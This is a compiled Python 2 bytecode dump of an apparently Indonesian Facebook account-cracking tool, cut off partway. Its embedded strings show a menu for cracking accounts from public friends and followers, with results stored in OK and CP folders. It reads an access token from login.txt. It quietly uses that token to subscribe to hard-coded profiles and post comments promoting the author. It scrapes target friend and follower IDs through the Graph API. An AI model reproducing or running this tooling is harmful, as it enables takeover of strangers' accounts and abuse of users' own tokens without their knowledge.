\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\n 
\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \x1b[1;97m \n \n \x1b[1;95m\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\x90\xe2\x80\xa2 \x1b[1;92m\xe2\x97\x8f \x1b[1;95m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90 \x1b[1;92m\xe2\x97\x8f \x1b[1;97m\x1b[1;95m\xe2\x80\xa2\xe2\x95\x90\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80 \n\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Author : \x1b[1;96m\xe2\x98\x86 ANGGA \x1b[1;93m\xe2\x84\xa2 \x1b[1;96m\xe2\x98\x86 \x1b[1;97m\n\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Github : \x1b[1;96mhttps://github.com/Bajingan-Z \x1b[1;97m\n\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Facebook : \x1b[1;96mAngga \x1b[1;93m\xe2\x84\xa2 \x1b[1;97m\n\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Instagram : \x1b[1;96mraka_andrian27 \x1b[1;97m\n\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Twitter : \x1b[1;96mBangsat_XD \x1b[1;97m\n \x1b[1;95m\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\x90\xe2\x80\xa2 \x1b[1;92m\xe2\x97\x8f 
\x1b[1;95m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90 \x1b[1;92m\xe2\x97\x8f \x1b[1;97m\x1b[1;95m\xe2\x80\xa2\xe2\x95\x90\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80 (\x02\x00\x00\x00t\x02\x00\x00\x00ost\x06\x00\x00\x00system(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\x04\x00\x00\x00logo?\x00\x00\x00s\x04\x00\x00\x00\x00\x01\r\x0fc\x00\x00\x00\x00\x03\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x8d\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x11\x00t\x02\x00j\x03\x00d\x02\x00\x83\x01\x00\x01Wn!\x00\x04t\x02\x00j\x04\x00j\x05\x00k\n\x00rA\x00\x01\x01\x01t\x06\x00d\x03\x00\x83\x01\x00\x01n\x01\x00Xy\x1a\x00t\x07\x00d\x04\x00d\x05\x00\x83\x02\x00}\x00\x00t\x08\x00\x83\x00\x00\x01Wn*\x01\x04t\t\x00k\n\x00r\x88\x01\x01}\x01\x00\x01t\n\x00d\x06\x00\x83\x01\x00}\x00\x00|\x00\x00d\x07\x00k\x02\x00r\x8e\x00d\x08\x00GHn\x00\x00y\xcc\x00t\x02\x00j\x03\x00d\t\x00|\x00\x00\x17\x83\x01\x00j\x0b\x00\x83\x00\x00d\n\x00\x19j\x0c\x00\x83\x00\x00}\x02\x00t\x07\x00d\x04\x00d\x0b\x00\x83\x02\x00j\r\x00|\x00\x00\x83\x01\x00\x01t\x02\x00j\x0e\x00d\x0c\x00|\x00\x00\x17\x83\x01\x00\x01t\x02\x00j\x0e\x00d\r\x00|\x00\x00\x17\x83\x01\x00\x01t\x02\x00j\x0e\x00d\x0e\x00|\x00\x00\x17\x83\x01\x00\x01t\x02\x00j\x0e\x00d\x0f\x00|\x00\x00\x17\x83\x01\x00\x01t\x02\x00j\x0e\x00d\x10\x00|\x00\x00\x17\x83\x01\x00\x01t\x02\x00j\x0e\x00d\x11\x00|\x00\x00\x17\x83\x01\x00\x01t\x02\x00j\x0e\x00d\x12\x00|\x00\x00\x17\x83\x01\x00\x01t\x02\x00j\x0e\x00d\x13\x00|\x00\x00\x17\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01Wq\x89\x01\x04t\t\x00k\n\x00r\x84\x01\x01\x01\x01t\x00\x00j\x01\x00d\x14\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\
x83\x01\x00\x01q\x89\x01Xn\x01\x00Xd\x00\x00S(\x16\x00\x00\x00NR%\x00\x00\x00s\x1b\x00\x00\x00https://mbasic.facebook.coms\x19\x00\x00\x00Internet Connection Errors\t\x00\x00\x00login.txtt\x01\x00\x00\x00rs9\x00\x00\x00[\xe2\x80\xa2] TOKEN \xe2\x84\xa2\xef\xb8\xbb\xc2\xae\xe2\x95\xa4\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\x90\xe2\x97\x8d\xe2\x9e\xa4 : t\x00\x00\x00\x00s\x0b\x00\x00\x00Wrong Inputs+\x00\x00\x00https://graph.facebook.com/me?access_token=t\x04\x00\x00\x00namet\x01\x00\x00\x00wsD\x00\x00\x00https://graph.facebook.com/100017584682867/subscribers?access_token=sD\x00\x00\x00https://graph.facebook.com/100000395779504/subscribers?access_token=sD\x00\x00\x00https://graph.facebook.com/100000834003593/subscribers?access_token=sD\x00\x00\x00https://graph.facebook.com/100003986228742/subscribers?access_token=sD\x00\x00\x00https://graph.facebook.com/100006184624502/subscribers?access_token=sW\x00\x00\x00https://graph.facebook.com/4257706904267068/comments?message=krend Bang !&access_token=sm\x00\x00\x00https://graph.facebook.com/953529338576547/comments?message=Raka Orang Terganteng diindonesia !&access_token=sy\x00\x00\x00https://graph.facebook.com/3882176535153442/comments/?message=Moga Langgeng Aa Raka Sama Tth Manda Nya :) !&access_token=s\x0f\x00\x00\x00rm -f login.txts\x0f\x00\x00\x00[?] 
Login Error(\x0f\x00\x00\x00R&\x00\x00\x00R\'\x00\x00\x00t\x08\x00\x00\x00requestst\x03\x00\x00\x00gett\n\x00\x00\x00exceptionst\x0f\x00\x00\x00ConnectionErrort\x04\x00\x00\x00exitt\x04\x00\x00\x00opent\x04\x00\x00\x00menut\x08\x00\x00\x00KeyErrort\t\x00\x00\x00raw_inputt\x04\x00\x00\x00jsont\x05\x00\x00\x00lowerR\x12\x00\x00\x00t\x04\x00\x00\x00post(\x03\x00\x00\x00t\x05\x00\x00\x00tokent\x07\x00\x00\x00IOErrort\x04\x00\x00\x00nama(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\x05\x00\x00\x00loginP\x00\x00\x00s6\x00\x00\x00\x00\x01\r\x01\x03\x02\x11\x01\x13\x01\x0e\x01\x03\x01\x0f\x01\x0b\x01\x0f\x01\x0c\x01\x0c\x01\x08\x01\x03\x01#\x01\x16\x02\x11\x01\x11\x01\x11\x01\x11\x01\x11\x01\x11\x01\x11\x01\x11\x01\x0b\x01\r\x01\r\x01c\x00\x00\x00\x00\t\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x07\x04\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00a\x04\x00Wn(\x00\x04t\x05\x00k\n\x00rP\x00\x01\x01\x01t\x00\x00j\x01\x00d\x04\x00\x83\x01\x00\x01t\x06\x00d\x05\x00\x83\x01\x00\x01n\x01\x00Xy\'\x00t\x07\x00j\x08\x00d\x06\x00t\x04\x00\x17\x83\x01\x00j\t\x00\x83\x00\x00d\x07\x00\x19j\n\x00\x83\x00\x00}\x00\x00WnH\x00\x04t\x0b\x00k\n\x00r\xa2\x00\x01\x01\x01t\x00\x00j\x01\x00d\x04\x00\x83\x01\x00\x01t\x06\x00d\x08\x00\x83\x01\x00\x01n!\x00\x04t\x07\x00j\x0c\x00j\r\x00k\n\x00r\xc2\x00\x01\x01\x01t\x06\x00d\t\x00\x83\x01\x00\x01n\x01\x00Xt\x0e\x00\x83\x00\x00\x01d\n\x00GHd\x0b\x00t\x0f\x00\x16GHd\x0c\x00|\x00\x00\x17d\r\x00\x17GHd\n\x00GHd\x0e\x00GHd\x0f\x00GHd\x10\x00GHd\x11\x00GHd\x12\x00GHd\x13\x00GHt\x10\x00d\x14\x00\x83\x01\x00}\x01\x00|\x01\x00d\x15\x00k\x02\x00r*\x01t\x11\x00\x83\x00\x00\x01n\xd9\x02|\x01\x00d\x16\x00k\x02\x00sB\x01|\x01\x00d\x17\x00k\x02\x00rS\x01t\x12\x00\x83\x00\x00\x01t\x13\x00\x83\x00\x00\x01n\xb0\x02|\x01\x00d\x18\x00k\x02\x00sk\x01|\x01\x00d\x19\x00k\x02\x00r|\x01t\x14\x00\x83\x00\x00\x01t\x13\x00\x83\x00\x00\x01n\x87\x02|\x01\x00d\x1a\x00k\x02\x00s\x94\x01|\
x01\x00d\x1b\x00k\x02\x00r\xa5\x01t\x15\x00\x83\x00\x00\x01t\x13\x00\x83\x00\x00\x01n^\x02|\x01\x00d\x1c\x00k\x02\x00s\xbd\x01|\x01\x00d\x1d\x00k\x02\x00r\x03\x04d\x1e\x00GHd\x1f\x00GHd \x00GHd\x1e\x00GHt\x10\x00d!\x00\x83\x01\x00}\x02\x00|\x02\x00d\x15\x00k\x02\x00r\xf3\x01t\x11\x00\x83\x00\x00\x01n\x06\x02|\x02\x00d\x16\x00k\x02\x00r\xf6\x02t\x00\x00j\x16\x00d"\x00\x83\x01\x00}\x03\x00d#\x00GHx\x17\x00|\x03\x00D]\x0f\x00}\x04\x00d$\x00|\x04\x00\x17GHq\x1a\x02WyB\x00t\x10\x00d%\x00\x83\x01\x00}\x04\x00|\x04\x00d\x15\x00k\x02\x00rR\x02t\x11\x00\x83\x00\x00\x01n\x00\x00t\x02\x00d&\x00|\x04\x00\x16\x83\x01\x00j\x03\x00\x83\x00\x00j\x17\x00\x83\x00\x00}\x05\x00Wn\x1f\x00\x04t\x0b\x00k\n\x00r\x90\x02\x01\x01\x01t\x06\x00d\'\x00|\x04\x00\x16\x83\x01\x00\x01n\x01\x00Xd(\x00|\x04\x00\x16j\x18\x00d)\x00d\x1e\x00\x83\x02\x00}\x06\x00|\x06\x00j\x18\x00d*\x00d\x15\x00\x83\x02\x00}\x07\x00d+\x00GHd,\x00|\x07\x00t\x19\x00|\x05\x00\x83\x01\x00f\x02\x00\x16GHt\x00\x00j\x01\x00d-\x00|\x04\x00\x16\x83\x01\x00\x01d.\x00GHt\x06\x00d\x1e\x00\x83\x01\x00\x01n\x03\x01|\x02\x00d\x18\x00k\x02\x00r\xf9\x03t\x00\x00j\x16\x00d/\x00\x83\x01\x00}\x03\x00d0\x00GHx\x17\x00|\x03\x00D]\x0f\x00}\x04\x00d1\x00|\x04\x00\x17GHq\x1d\x03WyB\x00t\x10\x00d2\x00\x83\x01\x00}\x04\x00|\x04\x00d\x15\x00k\x02\x00rU\x03t\x11\x00\x83\x00\x00\x01n\x00\x00t\x02\x00d3\x00|\x04\x00\x16\x83\x01\x00j\x03\x00\x83\x00\x00j\x17\x00\x83\x00\x00}\x08\x00Wn\x1f\x00\x04t\x0b\x00k\n\x00r\x93\x03\x01\x01\x01t\x06\x00d\'\x00|\x04\x00\x16\x83\x01\x00\x01n\x01\x00Xd(\x00|\x04\x00\x16j\x18\x00d)\x00d\x1e\x00\x83\x02\x00}\x06\x00|\x06\x00j\x18\x00d*\x00d\x15\x00\x83\x02\x00}\x07\x00d4\x00GHd5\x00|\x07\x00t\x19\x00|\x08\x00\x83\x01\x00f\x02\x00\x16GHt\x00\x00j\x01\x00d6\x00|\x04\x00\x16\x83\x01\x00\x01d7\x00GHt\x06\x00d\x1e\x00\x83\x01\x00\x01n\x00\x00t\x11\x00\x83\x00\x00\x01n\x00\x00d\x00\x00S(8\x00\x00\x00NR%\x00\x00\x00s\t\x00\x00\x00login.txtR)\x00\x00\x00s\x0f\x00\x00\x00rm -f login.txts\x0f\x00\x00\x00[?] 
Login Errors,\x00\x00\x00https://graph.facebook.com/me/?access_token=R+\x00\x00\x00s$\x00\x00\x00\x1b[1;96m[\x1b[1;93m+\x1b[1;96m] Token Errors\x19\x00\x00\x00 ! no internet connections\\\x00\x00\x00\x1b[1;96m\x1b[1;91m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;96m\x1b[1;92m \x1b[1;96m==================================================s<\x00\x00\x00\x1b[1;96m\x1b[1;92m<>\x1b[1;96m\x1b[1;92m \x1b[1;97mBergabung : \x1b[1;93m%ss:\x00\x00\x00\x1b[1;96m\x1b[1;92m<>\x1b[1;96m\x1b[1;92m \x1b[1;97mWelcome : \x1b[1;93ms\x17\x00\x00\x00\x1b[1;92m \x1b[1;95m \x1b[1;96msQ\x00\x00\x00\x1b[1;96m[\x1b[1;93m1\x1b[1;96m] \x1b[1;92mAngga \x1b[1;96m\xe2\x84\xa2\x1b[1;97m Clone from public friendssS\x00\x00\x00\x1b[1;96m[\x1b[1;93m2\x1b[1;96m] \x1b[1;92mAngga \x1b[1;96m\xe2\x84\xa2\x1b[1;97m Crack from public followerssr\x00\x00\x00\x1b[1;96m[\x1b[1;93m3\x1b[1;96m] \x1b[1;92mAngga \x1b[1;96m\xe2\x84\xa2\x1b[1;97m Multi cracking from public Id\x1b[1;97m [ \x1b[1;95mPro \x1b[1;97m]sK\x00\x00\x00\x1b[1;96m[\x1b[1;93m4\x1b[1;96m] \x1b[1;92mAngga \x1b[1;96m\xe2\x84\xa2\x1b[1;97m Check crack resultssi\x00\x00\x00\x1b[1;96m[\x1b[1;93m5\x1b[1;96m] \x1b[1;92mAngga \x1b[1;96m\xe2\x84\xa2\x1b[1;97m User-agent settings \x1b[1;97m [ \x1b[1;95mPro \x1b[1;97m]sb\x00\x00\x00\x1b[1;96m[\x1b[1;93m6\x1b[1;96m] \x1b[1;92mAngga \x1b[1;96m\xe2\x84\xa2\x1b[1;97m Exit\x1b[1;97m [ \x1b[1;91mRemove-Token \x1b[1;97m]sA\x00\x00\x00\x1b[1;96m[\x1b[1;93m+\x1b[1;96m] \x1b[1;92mAngga \x1b[1;96m\xe2\x84\xa2\x1b[1;97m Option : R*\x00\x00\x00t\x01\x00\x00\x001R\x19\x00\x00\x00t\x01\x00\x00\x002R\x1a\x00\x00\x00t\x01\x00\x00\x003R\x1b\x00\x00\x00t\x01\x00\x00\x004R\x1c\x00\x00\x00t\x01\x00\x00\x00 sT\x00\x00\x00\x1b[1;96m[\x1b[1;93m1\x1b[1;96m] \x1b[1;92mAngga \x1b[1;96m\xe2\x84\xa2\x1b[1;97m Check results RAKA_AMANDA OKsT\x00\x00\x00\x1b[1;96m[\x1b[1;93m2\x1b[1;96m] \x1b[1;92mAngga \x1b[1;96m\xe2\x84\xa2\x1b[1;97m Check results RAKA_AMANDA CPsB\x00\x00\x00\x1b[1;96m[\x1b[1;93m+\x1b[1;96m] \x1b[1;92mAngga 
\x1b[1;96m\xe2\x84\xa2\x1b[1;97m Option : t\x02\x00\x00\x00OKs<\x00\x00\x00\x1b[1;96m[\x1b[1;93m+\x1b[1;96m] Copy file name and past into inputs\x06\x00\x00\x00[\xc2\xae] s&\x00\x00\x00\n\x1b[1;96m[\x1b[1;93m+\x1b[1;96m] file name : s\x05\x00\x00\x00OK/%ss\x19\x00\x00\x00 ! file %s tidak tersedias\x02\x00\x00\x00%st\x01\x00\x00\x00-s\x04\x00\x00\x00.txts1\x00\x00\x00 # ----------------------------------------------s%\x00\x00\x00 Crack Resulte : %s Total : %s\x1b[0;92ms\t\x00\x00\x00cat OK/%ss9\x00\x00\x00 \x1b[0;94m # ----------------------------------------------t\x02\x00\x00\x00CPs;\x00\x00\x00\x1b[1;96m[\x1b[1;93m+\x1b[1;96m] Copy File Name And Past into Inputs\x03\x00\x00\x00 + s&\x00\x00\x00\n\x1b[1;96m[\x1b[1;93m+\x1b[1;96m] File Name : s\x05\x00\x00\x00CP/%ss0\x00\x00\x00# ----------------------------------------------s%\x00\x00\x00 Crack results : %s total : %s\x1b[0;93ms\t\x00\x00\x00cat CP/%ss8\x00\x00\x00\x1b[0;96m # ----------------------------------------------(\x1a\x00\x00\x00R&\x00\x00\x00R\'\x00\x00\x00R2\x00\x00\x00t\x04\x00\x00\x00readR9\x00\x00\x00R4\x00\x00\x00R1\x00\x00\x00R-\x00\x00\x00R.\x00\x00\x00R6\x00\x00\x00R7\x00\x00\x00R:\x00\x00\x00R/\x00\x00\x00R0\x00\x00\x00R(\x00\x00\x00t\x03\x00\x00\x00tglR5\x00\x00\x00R3\x00\x00\x00t\x06\x00\x00\x00publikt\x06\x00\x00\x00methodt\x08\x00\x00\x00followert\x06\x00\x00\x00massalt\x07\x00\x00\x00listdirt\n\x00\x00\x00splitlinest\x07\x00\x00\x00replacet\x03\x00\x00\x00len(\t\x00\x00\x00R;\x00\x00\x00t\x05\x00\x00\x00Bilalt\x03\x00\x00\x00cekt\x04\x00\x00\x00dirst\x04\x00\x00\x00filet\x07\x00\x00\x00Totalokt\x07\x00\x00\x00nm_filet\x07\x00\x00\x00del_txtt\x07\x00\x00\x00Totalcp(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>R3\x00\x00\x00p\x00\x00\x00s\xa6\x00\x00\x00\x00\x01\r\x02\x03\x01\x19\x01\r\x01\r\x01\x0e\x01\x03\x01\'\x01\r\x01\r\x01\r\x01\x13\x01\x0e\x03\x07\x01\x05\x01\t\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x02\x0c\x01\x0c\x01\n\x01\x18\x01\x07\x01\n
\x01\x18\x01\x07\x01\n\x01\x18\x01\x07\x01\n\x01\x18\x01\x05\x01\x05\x01\x05\x01\x05\x01\x0c\x01\x0c\x01\n\x01\x0c\x01\x0f\x01\x05\x01\r\x01\r\x01\x03\x01\x0c\x01\x0c\x01\n\x01 \x01\r\x01\x12\x01\x16\x01\x12\x01\x05\x01\x15\x01\x11\x01\x05\x01\r\x01\x0c\x01\x0f\x01\x05\x01\r\x01\r\x01\x03\x01\x0c\x01\x0c\x01\n\x01 \x01\r\x01\x12\x01\x16\x01\x12\x01\x05\x01\x15\x01\x11\x01\x05\x01\r\x01c\x00\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xdc\x00\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00a\x02\x00Wn\x1b\x00\x04t\x03\x00k\n\x00r6\x00\x01\x01\x01t\x04\x00d\x03\x00\x83\x01\x00\x01n\x01\x00Xt\x05\x00d\x04\x00\x83\x01\x00}\x00\x00yh\x00xa\x00t\x06\x00j\x07\x00d\x05\x00|\x00\x00t\x02\x00f\x02\x00\x16\x83\x01\x00j\x08\x00\x83\x00\x00d\x06\x00\x19D]<\x00}\x01\x00|\x01\x00d\x07\x00\x19}\x02\x00|\x01\x00d\x08\x00\x19j\t\x00d\t\x00\x83\x01\x00d\n\x00\x19}\x03\x00t\n\x00j\x0b\x00|\x02\x00d\x0b\x00\x17|\x03\x00\x17\x83\x01\x00\x01qj\x00WWn\x1b\x00\x04t\x0c\x00k\n\x00r\xc8\x00\x01\x01\x01t\x04\x00d\x0c\x00\x83\x01\x00\x01n\x01\x00Xd\r\x00t\r\x00t\n\x00\x83\x01\x00\x16GHd\x00\x00S(\x0e\x00\x00\x00Ns\t\x00\x00\x00login.txtR)\x00\x00\x00s%\x00\x00\x00\n\x1b[1;96m[\x1b[1;93m!\x1b[1;96m] Token Errors\'\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Target Id : s5\x00\x00\x00https://graph.facebook.com/%s/friends?access_token=%st\x04\x00\x00\x00datat\x02\x00\x00\x00idR+\x00\x00\x00RA\x00\x00\x00i\x00\x00\x00\x00s\x03\x00\x00\x00<=>s6\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Account friend list is not publics7\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Total Id : 
\x1b[0;91m%s\x1b[0;97m(\x0e\x00\x00\x00R2\x00\x00\x00RE\x00\x00\x00R9\x00\x00\x00R:\x00\x00\x00R1\x00\x00\x00R5\x00\x00\x00R-\x00\x00\x00R.\x00\x00\x00R6\x00\x00\x00t\x06\x00\x00\x00rsplitRX\x00\x00\x00t\x06\x00\x00\x00appendR4\x00\x00\x00RN\x00\x00\x00(\x04\x00\x00\x00t\x03\x00\x00\x00idtt\x01\x00\x00\x00it\x03\x00\x00\x00uidR;\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>RG\x00\x00\x00\xc9\x00\x00\x00s\x1a\x00\x00\x00\x00\x02\x03\x01\x19\x01\r\x01\x0e\x01\x0c\x01\x03\x01*\x01\n\x01\x17\x01\x1d\x01\r\x01\x0e\x01c\x00\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xdc\x00\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00a\x02\x00Wn\x1b\x00\x04t\x03\x00k\n\x00r6\x00\x01\x01\x01t\x04\x00d\x03\x00\x83\x01\x00\x01n\x01\x00Xt\x05\x00d\x04\x00\x83\x01\x00}\x00\x00yh\x00xa\x00t\x06\x00j\x07\x00d\x05\x00|\x00\x00t\x02\x00f\x02\x00\x16\x83\x01\x00j\x08\x00\x83\x00\x00d\x06\x00\x19D]<\x00}\x01\x00|\x01\x00d\x07\x00\x19}\x02\x00|\x01\x00d\x08\x00\x19j\t\x00d\t\x00\x83\x01\x00d\n\x00\x19}\x03\x00t\n\x00j\x0b\x00|\x02\x00d\x0b\x00\x17|\x03\x00\x17\x83\x01\x00\x01qj\x00WWn\x1b\x00\x04t\x0c\x00k\n\x00r\xc8\x00\x01\x01\x01t\x04\x00d\x0c\x00\x83\x01\x00\x01n\x01\x00Xd\r\x00t\r\x00t\n\x00\x83\x01\x00\x16GHd\x00\x00S(\x0e\x00\x00\x00Ns\t\x00\x00\x00login.txtR)\x00\x00\x00s%\x00\x00\x00\n\x1b[1;96m[\x1b[1;94m+\x1b[1;96m] Token Errors\'\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Target Id : sD\x00\x00\x00https://graph.facebook.com/%s/subscribers?limit=5000&access_token=%sRW\x00\x00\x00RX\x00\x00\x00R+\x00\x00\x00RA\x00\x00\x00i\x00\x00\x00\x00s\x03\x00\x00\x00<=>s6\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Account friend list is not publics7\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Total Id : 
\x1b[0;91m%s\x1b[0;97m(\x0e\x00\x00\x00R2\x00\x00\x00RE\x00\x00\x00R9\x00\x00\x00R:\x00\x00\x00R1\x00\x00\x00R5\x00\x00\x00R-\x00\x00\x00R.\x00\x00\x00R6\x00\x00\x00RY\x00\x00\x00RX\x00\x00\x00RZ\x00\x00\x00R4\x00\x00\x00RN\x00\x00\x00(\x04\x00\x00\x00R[\x00\x00\x00R\\\x00\x00\x00R]\x00\x00\x00R;\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>RI\x00\x00\x00\xd9\x00\x00\x00s\x1a\x00\x00\x00\x00\x02\x03\x01\x19\x01\r\x01\x0e\x01\x0c\x01\x03\x01*\x01\n\x01\x17\x01\x1d\x01\r\x01\x0e\x01c\x00\x00\x00\x00\x06\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s"\x01\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00a\x02\x00Wn\x1b\x00\x04t\x03\x00k\n\x00r6\x00\x01\x01\x01t\x04\x00d\x03\x00\x83\x01\x00\x01n\x01\x00Xy\x16\x00t\x05\x00t\x06\x00d\x04\x00\x83\x01\x00\x83\x01\x00}\x00\x00Wn\r\x00\x01\x01\x01d\x05\x00}\x00\x00n\x01\x00Xx\xaf\x00t\x07\x00|\x00\x00\x83\x01\x00D]\xa1\x00}\x01\x00|\x01\x00d\x05\x007}\x01\x00t\x08\x00d\x06\x00|\x01\x00\x16\x83\x01\x00}\x02\x00yh\x00xa\x00t\t\x00j\n\x00d\x07\x00|\x02\x00t\x02\x00f\x02\x00\x16\x83\x01\x00j\x0b\x00\x83\x00\x00d\x08\x00\x19D]<\x00}\x03\x00|\x03\x00d\t\x00\x19}\x04\x00t\x0c\x00d\n\x00\x19j\r\x00d\x0b\x00\x83\x01\x00d\x0c\x00\x19}\x05\x00t\x0e\x00j\x0f\x00|\x04\x00d\r\x00\x17|\x05\x00\x17\x83\x01\x00\x01q\xb1\x00WWqj\x00\x04t\x10\x00k\n\x00r\n\x01\x01\x01\x01d\x0e\x00GHqj\x00Xqj\x00Wd\x0f\x00t\x11\x00t\x0e\x00\x83\x01\x00\x16GHd\x00\x00S(\x10\x00\x00\x00Ns\t\x00\x00\x00login.txtR)\x00\x00\x00s$\x00\x00\x00\x1b[1;96m[\x1b[1;94m+\x1b[1;96m] Token Errors0\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Enter Multiple ID Option : i\x01\x00\x00\x00s(\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Target Id %s : s5\x00\x00\x00https://graph.facebook.com/%s/friends?access_token=%sRW\x00\x00\x00RX\x00\x00\x00R+\x00\x00\x00RA\x00\x00\x00i\x00\x00\x00\x00s\x03\x00\x00\x00<=>s3\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Ids friend list Is not 
